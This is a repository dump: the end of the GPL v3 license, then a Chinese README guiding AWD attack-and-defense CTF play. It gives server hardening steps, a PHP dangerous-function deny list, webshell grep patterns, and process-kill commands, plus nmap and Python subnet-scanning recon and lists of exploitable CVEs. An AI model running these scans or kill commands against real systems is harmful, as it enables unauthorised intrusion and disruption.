impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AWD比赛指导手册 2 | 3 | ### 纸上得来终觉浅,绝知此事要躬行。 4 | 5 | ![AWD-Guide](https://socialify.git.ci/AabyssZG/AWD-Guide/image?description=1&font=Bitter&forks=1&language=1&logo=https%3A%2F%2Favatars.githubusercontent.com%2Fu%2F54609266%3Fv%3D4&owner=1&pattern=Solid&stargazers=1&theme=Dark) 6 | 7 | **手册版本号:V1.2.2-2023/10/21** 8 | 9 | 这是一本能让你从零开始学习AWD并深入AWD的手册,我也会根据经验和需求逐步完善相关内容。如果你要参加AWD相关比赛,相信本项目能给你带来帮助~ 10 | 11 | ### 如何在线阅读? 12 | 13 | - 个人博客地址: [https://blog.zgsec.cn/archives/484.html](https://blog.zgsec.cn/archives/484.html) 14 | - 微信公众号地址:[https://mp.weixin.qq.com/s/1vR1rcGHK6YYdXlp4McR_w](https://mp.weixin.qq.com/s/1vR1rcGHK6YYdXlp4McR_w) 15 | 16 | **如果你觉得本项目不错,欢迎给我点个Star,万分感谢~~ 有什么新的攻击或者防守的姿势、手法,欢迎与我交流** 17 | 18 | 19 | 20 | ## 0# 什么是AWD 21 | 22 | ### 0.1# AWD赛制介绍 23 | 24 | 「 攻防模式 | AWD (Attack With Defense) 」 是 CTF比赛 「CTF Capture The Flag」 几种主要的比赛模式之一,该模式常见于线下赛。 25 | 26 | 在该模式中,每个队伍都拥有一个相同的初始环境 ( 我们称其为 GameBox ),该环境通常运行着一些特定的服务或应用程序,而这些服务通常包含一些安全漏洞。参赛队伍需要挖掘利用对方队伍服务中的安全漏洞,获取 Flag 以获得积分; 同时,参赛队伍也需要修补自身服务漏洞进行防御,以防被其他队伍攻击和获取 Flag。 27 | 28 | 主要特点为:强调实战性、实时性、对抗性,综合考量竞赛队的渗透能力和防护能力。 29 | 30 | ### 0.2# 比赛整体流程 31 | 32 | - 赛前准备环节:我们会分配到多个靶机服务器,通常是分配给我们 `SSH` 或者 `VNC` 的用户名和密码,还有相关IP等信息 33 | - 安全加固环节:我们需要先自己去登录靶机服务器,进行30分钟的安全加固(源码备份/弱口令修改/代码审计和修复/漏洞修复等) 34 | - 自由攻击环节:安全加固时间过后,开始自由攻击环节,通过对别的队伍的靶机服务器进行攻击(弱口令/Web漏洞/系统漏洞等)获得Flag进行加分,对应队伍失分 35 | 36 | 37 | 38 | ## 1# 比赛环境 39 | 40 | 通常比赛环境有以下三种情况: 41 | 42 | - 混合靶机情况:运维机器 `Windows 10` + 攻击机 `Kali Linux` + Win靶机 `Windows Server 2003/2008/2012` 或者 `Windows 7` + Linux靶机 `Centos7.x` 或者 `Ubuntu 16.04/17.01/20.04` 43 | - 纯Linux靶机情况:运维机器 `Windows 10` + 攻击机 `Kali Linux` + Linux靶机 `Centos7.x` 或者 `Ubuntu 16.04/17.01/20.04` 44 | - 纯Windows靶机情况:运维机器 `Windows 10` + 攻击机 `Kali Linux` + Win靶机 `Windows Server 2003/2008/2012` 或者 `Windows 7` 45 | 46 | 可能有师傅这里看不太懂,那我可以用大白话描述一下:比赛的时候,会给你1~2台运维机器(一般是Win10里面装了Kali)以及好几台服务器(也就是上面说的靶机),服务器上面有漏洞,要先抓紧去找到漏洞并修复(可别忘了弱口令哦),再通过找到的漏洞去攻击别的队伍的服务器拿到Flag从而得分 47 | 48 | 49 | 50 | ## 2# 安全加固环节(Defense) 51 | 52 | ### 2.0# 基本加固流程 53 | 54 | #### 2.0.1 Windows加固流程 55 | 56 | 先备份:Web源码、数据库 57 | 58 | 1. 445加固,开启防火墙或IP高级安全策略 59 | 2. 开启系统日志审计功能 60 | 3. 禁用guest账户、关闭文件共享 61 | 4. 确保启动项内容是可控的 62 | 5. 限制3389远程访问控制的连接数:在本地组策略编辑器里面,依次展开计算机配置-->管理模板-->Windows组件-->远程桌面服务-->远程桌面会话主机-->连接-->限制连接的数量 63 | 6. 使用工具监控关键目录文件:文件操作监控.exe、御剑文件监控.exe 64 | 7. 恶意代码文件,通过PCHunter、Monitor查找 65 | 8. Web目录环境查找相关可疑文件:jpg/png/rar,查看属性、解压看文件内容 66 | 9. NTFS扫描磁盘查找隐藏的交换流数据 67 | 10. 查找系统所有账户信息,禁止非Administrator账户 68 | 11. 修改Web站点管理员访问路径、默认口令、数据库口令 69 | 12. 安装WAF脚本,防护Web站点,禁止其他漏洞 70 | 71 | #### 2.0.2 Linux加固流程 72 | 73 | 先备份:Web源码、数据库 74 | 75 | 1. 系统口令修改,团队统一口令 76 | 2. 通过 `.bash_history` 查找历史命令操作,发现痕迹 77 | 3. 查看计划任务:`crontab -l`;编辑计划任务:`crontab -e` 78 | 4. 查看 `/etc/init.d/rc.local` 中启动服务有无异常 79 | 5. 使用脚本开启进程监控、目录监控、流量监控 80 | 6. Web站点口令,站点管理员路径修改 81 | 7. 系统加固:iptable 82 | 83 | ### 2.1# 基本信息搜集 84 | 85 | 在防守的时候,信息搜集也很重要,正所谓“知己知彼,百战不殆” 86 | 87 | #### 2.1.1 明确Linux机器信息 88 | 89 | ```c 90 | uname -a //系统信息 91 | ps -aux //查询进程信息 92 | ps -ef | grep 进程名称 //筛选指定进程 93 | id //用于显示用户ID,以及所属群组ID 94 | cat /etc/passwd //查看用户情况 95 | ls /home/ //查看用户情况 96 | find / -type d -perm -002 //可写目录检查 97 | ifconfig //Linux上查看网卡信息 98 | ip addr show //Linux上查看网卡信息 99 | ``` 100 | 101 | #### 2.1.2 明确Windows机器信息 102 | 103 | ```c 104 | whoami /all //Windows上查看用户详细信息 105 | ipconfig /all //Windows上查看网卡信息 106 | ``` 107 | 108 | #### 2.1.3 查看开放端口 109 | 110 | ```c 111 | netstat //查看活动连接 112 | netstat -ano/-a //查看端口情况 113 | netstat -anp //查看端口 114 | firewall-cmd --zone= public --remove-port=80/tcp –permanent //关闭端口 115 | firewall-cmd –reload //防火墙重启 116 | ``` 117 | 118 | #### 2.1.4 默认口令(弱口令)更改 119 | 120 | 为了防范弱口令攻击,Mysql密码默认都是root,phpstudy默认密码123456 121 | 122 | 还有其他默认密码admin,top100, top1000等 123 | 124 | **尤其是WEB应用的后台密码修改** 125 | 126 | ```c 127 | passwd username //ssh口令修改 128 | set password for mycms@localhost = password('18ciweufhi28746'); //MySQL密码修改 129 | find /var/www//html -path '*config*’ //查找配置文件中的密码凭证 130 | ``` 131 | 132 | #### 2.1.5 找本地Flag 133 | 134 | ```c 135 | grep -r "flag" /var/www/html/ //Linux:在Web目录下查找flag 136 | findstr /s /i "flag" *.* //Windows:当前目录以及所有子目录下的所有文件中查找"flag"这个字符串 137 | ``` 138 | 139 | #### 2.1.6 设置禁Ping 140 | 141 | ```c 142 | echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all //临时开启禁ping 143 | echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all //关闭禁ping 144 | ``` 145 | 146 | ### 2.2# Web安全加固 147 | 148 | #### 2.2.1 备份源码 149 | 150 | 防止在对源码进行修改时出问题,或者被攻击方删除源码而准备 151 | 152 | 压缩源码: 153 | 154 | ```C 155 | tar -cvf web.tar /var/www/html 156 | zip -q -r web.zip /var/www/html 157 | ``` 158 | 159 | 解压缩源码: 160 | 161 | ```C 162 | tar -xvf web.tar -c /var/www/html 163 | unzip web.zip -d /var/www/html 164 | ``` 165 | 166 | 备份源码: 167 | 168 | ```C 169 | mv web.tar /tmp 170 | mv web.zip /home/xxx 171 | ``` 172 | 173 | 上传和下载源码: 174 | 175 | ```c 176 | scp username@servername:/path/filename /tmp/local_destination //从服务器下载单个文件到本地 177 | scp /path/local_filename username@servername:/path //从本地上传单个文件到服务器 178 | scp -r username@servername:remote_dir/ /tmp/local_dir //从服务器下载整个目录到本地 179 | scp -r /tmp/local_dir username@servername:remote_dir //从本地上传整个目录到服务器 180 | ``` 181 | 182 | #### 2.2.2 设置只读权限 183 | 184 | 对Web文件设置只读和执行权限(PHP等动态语言需要执行权限) 185 | 186 | ```c 187 | chmod 0555 /var/www/html/* 188 | chmod 0555 /var/www/html/*.php 189 | ``` 190 | 191 | Web根目录设置只读和执行权限 192 | 193 | ```c 194 | chmod 0555 /var/www/html 195 | ``` 196 | 197 | 改变文件的属主和属组来设置严格的权限 198 | 199 | ```c 200 | chown -R root:root /var/www/html/ //设置拥有人为 root:root 或 httpd:httpd (推荐) 201 | chown -R apache:apache /var/www/html/ //确保 apache 拥有 /var/www/html/ 202 | ``` 203 | 204 | #### 2.2.3 配置 `.htaccess` 205 | 206 | 利用 `.htaccess` 配置文件禁止php文件执行 207 | 208 | ```php 209 | //指定目录后续的指令将应用于该目录 210 | Options -ExecCGI -Indexes //禁用了目录中的 CGI 执行和目录索引(显示目录内容列表)功能。 211 | AllowOverride None //不允许在该目录中使用 .htaccess 文件来覆盖服务器的配置。 212 | RemoveHandler .php .phtml .php3 .pht .php4 .php5 .php7 .shtml 213 | RemoveType .php .phtml .php3 .pht .php4 .php5 .php7 .shtml 214 | //这两个指令移除指定文件扩展名的处理器和类型。 215 | //在这种情况下,这些指令从 Apache 的处理列表中移除了与 PHP 相关的扩展名和服务器端包含(SSI)文件类型。 216 | php_flag engine off //这个指令将 PHP 的引擎标志(engine)设置为关闭状态,从而禁用了在该目录中执行 PHP 脚本的能力。 217 | 218 | deny from all 219 | //这三行命令使用正则表达式匹配了以 .php、.phtml、.php3、.pht、.php4、.php5、.php7、.shtml 结尾的文件,并将其访问权限设置为拒绝所有 220 | 221 | ``` 222 | 223 | #### 2.2.4 PHP参数安全配置 224 | 225 | 首先找到PHP的配置文件 226 | 227 | ```c 228 | /etc/php/{version}/php.ini 229 | ``` 230 | 231 | 禁用高危函数 232 | 233 | ```php 234 | disable_functions = dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link 235 | ``` 236 | 237 | 配置 `open_basedir` (将用户访问文件的活动范围限制在指定的区域) 238 | 239 | ```php 240 | open_basedir=/var/www/html 241 | ``` 242 | 243 | 禁用魔术引号(自动对外部来源数据进行转义,防止SQL注入) 244 | 245 | ```php 246 | magic_quotes_gpc = Off 247 | ``` 248 | 249 | 关闭PHP伪协议 250 | 251 | ```php 252 | allow_url_fopen = Off 253 | allow_url_include = Off 254 | ``` 255 | 256 | 重启PHP 257 | 258 | ```c 259 | sudo service php7.0-fpm restart 260 | sudo systemctl restart php7.0-fpm.service 261 | ``` 262 | 263 | ### 2.3# 数据库安全加固 264 | 265 | #### 2.3.1 Mysql加固 266 | 267 | 为了防范弱口令攻击,Mysql密码默认都是root,phpstudy默认密码123456 268 | 269 | 1. 不使用默认口令,修改成复杂的,并确保和web环境连接 270 | 2. 设置只允许本地127.0.0.1账户登录:修改 `bind-address=127.0.0.1` ;在配置文件中加入 `seccure_file_priv=NULL` 271 | 3. 开启日志审计功能:`general_log_file=`路径 272 | 273 | 因为最常用的是Mysql数据库,所以基本的攻防大部分都是用MySql数据库的命令 274 | 275 | 备份指定数据库: 276 | 277 | ```sql 278 | mysqldump –u username –p password databasename > target.sql 279 | ``` 280 | 281 | 备份所有数据库: 282 | 283 | ```sql 284 | mysqldump –all -databases > all.sql 285 | ``` 286 | 287 | 导入数据库: 288 | 289 | ```sql 290 | mysql –u username –p password database < from.sql 291 | ``` 292 | 293 | 对于MySQL的攻防,可以看这篇文章:[https://blog.zgsec.cn/archives/26.html](https://blog.zgsec.cn/archives/26.html) 294 | 295 | MySQL默认配置文件路径: 296 | 297 | ``` 298 | C:\\Program Files\MySQL\MySQLServer 5.1\my.ini //Windows 299 | /etc/my.cnf //Linux 300 | /etc/mysql/my.cnf //Linux 301 | ``` 302 | 303 | 修改 `secure_file_priv` 参数(日志功能的对应目录) 304 | 305 | ```sql 306 | secure_file_priv="" 307 | ``` 308 | 309 | 重载MySQL配置 310 | 311 | ```sql 312 | FLUSH PRIVILEGES 313 | ``` 314 | 315 | 重启MySQL服务 316 | 317 | ```c 318 | sudo service mysql restart 319 | sudo systemctl restart mysql 320 | ``` 321 | 322 | #### 2.3.2 Mssql加固 323 | 324 | 1. 删除不必要的账号 325 | 2. SQLServer用户口令安全 326 | 3. 根据用户分配帐号避免帐号共享 327 | 4. 分配数据库用户所需的最小权限 328 | 5. 网络访问限制 329 | 6. SQLServer登录审计 330 | 7. SQLServer安全事件审计 331 | 8. 配置日志功能 332 | 333 | ### 2.4# 远程控制加固 334 | 335 | #### 2.4.1 SSH安全加固 336 | 337 | 限制IP登录方法 338 | 339 | ```c 340 | sudo nano /etc/ssh/sshd_config //以root权限编辑SSH配置文件 341 | AllowUsers username@192.168.0.100 //找到并编辑以下行,确保其取消注释并设置为所需的IP地址 342 | ``` 343 | 344 | 禁用 `root` 远程登录 345 | 346 | ```c 347 | sudo nano /etc/ssh/sshd_config //以root权限编辑SSH配置文件 348 | PermitRootLogin no //将PermitRootLogi设置为“no” 349 | ``` 350 | 351 | 按用户和组限制SSH登录 352 | 353 | ```c 354 | sudo nano /etc/ssh/sshd_config //以root权限编辑SSH配置文件 355 | AllowUsers testuser //设置只允许 testuser 登录SSH 356 | AllowUsers testuser@192.168.1.100 //设置只允许 192.168.1.100 的机器用 testuser 账户登录SSH 357 | AllowGroups test //设置用户组白名单 358 | //需要注意的是:如果同时指定了 AllowUsers 与 AllowGroups 那么必须要在两个选项中都匹配到的用户才能进行SSH登录 359 | ``` 360 | 361 | 重启SSH服务 362 | 363 | ```c 364 | sudo service sshd restart 365 | sudo systemctl restart sshd.service 366 | ``` 367 | 368 | #### 2.4.2 RDP远程登录安全加固 369 | 370 | 删除默认帐户并手动添加新用户: 371 | 372 | - 步骤1:按 `Win + R` 打开运行对话框,输入 `secpol.msc` 并单击 “确定” 373 | - 步骤2:导航至此处:本地策略-->用户权限分配,再双击打开 “允许通过远程桌面服务登录” 374 | - 步骤3:删除此窗口中列出的管理员和远程桌面用户(或计算机上的任何其他用户或组) 375 | - 步骤4:之后单击 “添加用户或组” 并手动添加您要授予远程桌面访问权限的用户 376 | 377 | 更改默认RDP端口号: 378 | 379 | - 步骤1:打开运行对话框,输入 `regedit` 并单击 “确定” 380 | - 步骤2:打开 `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp` ,向下滚动并找到 `PortNumber` 然后双击它 381 | - 步骤3:选择 “十进制”,修改为您想要设置的端口号,然后单击 “确定” 382 | 383 | ### 2.5# 应急响应 384 | 385 | #### 2.5.1 查询进程线程 386 | 387 | ```c 388 | netstat 389 | ps -aux 390 | netstat -apt 391 | ``` 392 | 393 | #### 2.5.2 杀掉进程 394 | 395 | ```c 396 | kill -9 pid //Linux上 397 | taskkill /f /pid pid //Windows上 398 | ``` 399 | 400 | #### 2.5.3 搜索WebShell文件 401 | 402 | ```c 403 | find /var/www/html -name *.php -mmin -5 //查看最近5分钟修改文件 404 | find ./ -name '*.php' | xargs wc -l | sort -u //寻找行数最短文件,一般有可能是一句话木马 405 | grep -r --include=*.php '[^a-z]eval($_POST' /var/www/html //查包含关键字的php文件 406 | find /var/www/html -type f -name "*.php" | xargs grep "eval(" |more //在Linux系统中使用find、grep和xargs命令的组合,用于在指定目录(/var/www/html)下查找所有以.php为扩展名的文件,并搜索这些文件中包含字符串"eval("的行,并使用more命令来分页显示结果以便在输出较长时进行逐页查看 407 | ``` 408 | 409 | #### 2.5.4 查杀不死马 410 | 411 | 也可以利用命令自动进行查找删除 412 | 413 | ```c 414 | ps -aux | grep www-data | grep -v grep | awk '{print $2}' | xargs kill -9 415 | ``` 416 | 417 | 然后重启服务 418 | 419 | ```c 420 | service php-fpm restart 421 | ``` 422 | 423 | #### 2.5.5 杀弹反弹shell 424 | 425 | 老规矩查看进程 426 | 427 | ```c 428 | ps -ef 429 | px -aux 430 | ps -aux | grep www-data 431 | ``` 432 | 433 | 注意 `www-data` 权限的 `/bin/sh`,很有可能是nc 434 | 435 | 再就是上老一套命令 436 | 437 | ```c 438 | kill ps -aux | grep www-data | grep apache2 | awk '{print $2}' 439 | ``` 440 | 441 | 442 | 443 | ## 3# 自由攻击环节(Attack) 444 | 445 | ### 3.0# 主要准备内容 446 | 447 | 1. 各类CMS软件包最新版准备 448 | 2. 扫描工具:Nmap、Nessus、Metasploit更新 449 | 2. 漏洞利用脚本Poc、Exp 450 | 451 | ### 3.1# 基本信息搜集 452 | 453 | #### 3.1.1 主机信息搜集 454 | 455 | Nmap 456 | 457 | ```c 458 | nmap -sn 192.168.0.0/24 //C段存活扫描 459 | ``` 460 | 461 | httpscan 462 | 463 | ```c 464 | httpscan.py 192.168.0.0/24 –t 10 //C段存活扫描 465 | ``` 466 | 467 | #### 3.1.2 端口扫描 468 | 469 | ```c 470 | nmap -sV 192.168.0.2 //扫描主机系统版本 471 | nmap -sS 192.168.0.2 //扫描主机常用端口 472 | nmap -sS -p 80,445 192.168.0.2 //扫描主机部分端口 473 | nmap -sS -p- 192.168.0.2 //扫描主机全部端口 474 | ``` 475 | 476 | Python脚本 477 | 478 | ```python 479 | import requests 480 | 481 | for x in range(2,255): 482 | url = "http://192.168.1.{}".format(x) 483 | try: 484 | r = requests.post(url) 485 | print(url) 486 | except: 487 | pass 488 | ``` 489 | 490 | ### 3.2# 外部打点 491 | 492 | #### 3.2.0 常见系统漏洞 493 | 494 | - MS17-010(永恒之蓝,可看[https://blog.zgsec.cn/archives/172.html](https://blog.zgsec.cn/archives/172.html)) 495 | - MySQL进行UDF提权(SQL注入或者MySQL弱口令) 496 | - MsSQL进行系统命令执行(SQL注入或者MsSQL弱口令) 497 | - SSH弱口令或默认口令 498 | - PWN(这个要看具体AWD比赛提供的内容了) 499 | 500 | #### 3.2.1 中间件漏洞 501 | 502 | - IIS(解析漏洞、远程代码执行) 503 | - Apache(解析漏洞) 504 | - Nginx(解析漏洞) 505 | - Jboss(CVE-2017-7504/CVE-2017-12149/CVE-2015-7501) 506 | - Mysql(弱口令) 507 | - Tomcat(弱口令Getshell) 508 | - Weblogic(CVE-2020-2551/CVE-2020-2555/CVE-2020-2883) 509 | - SpringBoot(未授权访问漏洞和RCE漏洞,具体可看[https://blog.zgsec.cn/archives/129.html](https://blog.zgsec.cn/archives/129.html)) 510 | 511 | #### 3.2.2 集成服务环境漏洞 512 | 513 | - wampserver 514 | - xamppserver 515 | 516 | #### 3.2.3 CMS漏洞利用 517 | 518 | 